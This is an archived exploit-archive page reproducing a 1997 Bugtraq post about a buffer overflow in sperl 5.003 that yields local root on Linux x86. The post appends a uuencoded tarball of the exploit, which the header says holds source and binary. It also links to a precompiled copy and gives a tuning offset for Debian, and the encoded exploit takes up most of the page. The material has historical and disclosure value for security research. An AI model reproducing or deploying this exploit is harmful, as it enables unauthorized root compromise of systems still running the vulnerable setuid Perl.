Sperl 5.003 hole

Summary

Description:	Another hole in sperl, this time a buffer overflow.
Author:	Willy Tarreau (tarreau@aemiaif.ibp.fr)
Compromise:	root (local)
Vulnerable Systems:	Systems with Sperl 5.003, this exploit is for Linux x86.
Date:	17 April 1997
Notes:	I have appended the uuencoded exploit src&bin after this post. Debian is vulnerable if you use offset of 1169 instead of those tried by the exploit, according to David Luyer (luyer@ucs.uwa.edu.au)

Details

Exploit:

Date: Thu, 17 Apr 1997 14:11:09 -0700
From: Murphy 
To: BUGTRAQ@NETSPACE.ORG
Subject: Buffer overflow in sperl5.003
Parts/attachments:
   1 Shown    17 lines  Text                                                
   2         2.2 KB     Application, ""                                     
----------------------------------------


 Its came to my attention that there is a buffer overflow bug in
sperl5.003 that will allow local users gain root access, if SUID root.
 The exploit and bug was made and brought to my attention by Willy Tarreau
(tarreau@aemiaif.ibp.fr).
 Attached is the source for the exploit. Since it requires some work to
be done to the compiled exploit (Stripping of 5 byte at the begining and
end of the binary), the precompiled Linux x86 exploit can be found at
http://www.ecst.csuchico.edu/~jtmurphy/localusers.html.

PS. Have a nice a day.

--
----------------------------------------------------------------------------
Jason T. Murphy |  Finger for PGP Public Key  | jtmurphy@ecst.csuchico.edu
  The Linux Security Home Page -> http://www.ecst.csuchico.edu/~jtmurphy
Security buff, Linux Freak, PC Tech @ Chico State, and all around nice guy.


--Exploit:
begin 600 sperlexp_source.tgz
M'XL(`%I%WZ6/L!=[M<`^Q#[&WNTY0TIVDL)N"EM&T/D2
M6R)G>.9P9K[SG4,SFPL5M;?N%-#SAD,?M@!@..R;3[_7,Y\5/(!!M]/O>%[?
M&V"K[_>[6]"_6[=*Y)GF"F`+?RO!\VOZ"95MPJ'-(C/KKU7!H\@U![<_AN]Y
MP_XUZS_L#LKU]X>#;A_W@M\==`9;X-V^*V_C=[[^#W;:8YFT=9#-V`/0,P'9
M3$01)#P6(#.8RH5(8%Q`702S%%H)N*Y;!YZ$$./4P5B`6/)`1P4,(9AQE<%,
M*.&@L51!D>9U-#;C"P$ZA3@-Y:0H1]$\>`5CG@F88$9,G.Y<5+E
MB3F@\V1:\-"%T8SK.MY;FE+GU&7FWFJGZ,#9,3P^@6?0&'$[MZWFVK0?!%R#
MN7OL<[!:BGIYQ:Q^X+9%-@>,G]^Q3VGL#S]D(@G9S>M?\O_Y\>'CI\=WM<>0
M_X.!=PW_.[T5_X?=80=;.W[7M_S?!(YF`GF(/%4PYWIFR%AMP27"@7P>
M"3%/$;5E^2Q*$KB1BY%AF.I])45R&,:X;\
MZ[J,C=!MP;-"8,"ZX,5K_N!_/,QD/,<0IHLY1IF8OQ)U%YY0C#B-\FGK6>LT
MPLOV6TW&'J=)':VD2A7`QVFNS:34,C&-1:*YB5L3GD>Z1@&P-B'NFV"*@0:B
M-)G6(!99QJPQXG_O&O[WK^A_Q^\3_X=>
MU_)_$T#"[0-I!RG-2F#8MOM:2LA8$`F>[+-M%4-KLNZ_ZZ:P^S<48"48>V"`
MNCQ"H-T-5N*.)HCCR(+R4J1`G"Y*6O1A(A6R
MF#KT(>*4@13$_`N)P8L#VN%(3!%*C>QKC`5?--'>$YBK="'#BEME-D%YBLE*
MR%D:)T]"7&--MF?I!046I/DKI"G=U3O",/6=F'@_*/F/"^H&=S;&#?SO='J7
M_!_VN\3_3J=O^;\)M'=O#6W6W@4XXE&01Y0R7,K8/)6)%HH2TWR5[Z.T(2>G
MBL%(<2#\Q%NHS`9I@BF[2/`GO.HF%C>4\U>HC&%GS65"#1PG
M2YDD(IW@^5"X\!57IFEGQWA4>K^^&:K"S)2MC)DHRY."#$B=0:^*D%25H".>
M0WD)Q3:,4.0I^EO'6H&ZE\YAZK,VMJJQYI3_E+.DI@N3,>5CC=.$H;CR2*=7
M"SN!,R.H>B3/*V/2.)#I$"?5?=>`ND9E[';PVXR5:=@O&[M%.K$'R(LHQUW]
M,4Z:3-W9)XQEE&,&N!LCB428"ES:>:,)WS.`ER]Y%K]\V<`,,UU$\`&V.!\(
MOH1:\X#]P%B,>PP:2$5:Q,`QY3KL[M**E@8H/445S.24=A9>?H`GJ7\H`AX]
M\NB0SDR@018^\9M5"]>II%.+K_UOFU4OO/S1RKV6Z48-$\IF1>-/Y%O/\9UR
M-S2O;?KA/=#1]Q6E_F,R=W_Z[_>ZPW7]WQEX1O^[]OG?1G"+`6MW%TF,$G6I
M[*NR&DO+*(-5K5P^4DSR>(QZB*ICY,F%SPH,)J9R-JI-MJB%I-=;]GQHU`_K
M3;B824P$L.)0&";2),Q0SA+2,,HP(C@Z/2>-J6'@!!$L:U3%DZ4@S:.PE,:Q
MH`>:0E-"@EUQ7>'9R2DTO.5'7M.!L?$2!Z7HB/I&J87)2?Z:8W0B6W,42_+L"(Z/_E);
M9SV82=!P5'^L3J$3R;3,:B@9J&?H.=Z%Q`K&(6/DP822AFK"QXHGP4QDJX]F
MC)N>__A#;Q7_^_V>>?[3]VS\WPBV,56DG>]@.&7;2Z0.)HP._K#M>9[-P'R+
M!`.;[/MHFFWG+/8]OW
M?=\6):[P'TO:NQGC)OY#]?>?;K\S,+'`[]B__VX(/_[7_^?I3]\\_-\__O7'
MT[,?__WS'_[S]_OVR6)S>.W]CZE(A)*W7@C>]/Y'?]B[\OY/CUI]KV/YOPE<
M??_C\KV%C_;>?FW!6[VVT$K@^>G(O)8`^^SA[J]Y3X'>P+CF/84K;TR\/72G
MMYFA<9@WA^[MW>70][WV%A86%A86%A86%A86%A86%A86%A86%A86%A86%A86
5%A86%A86%A86[R?^#X2T'48`4```
`
end

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: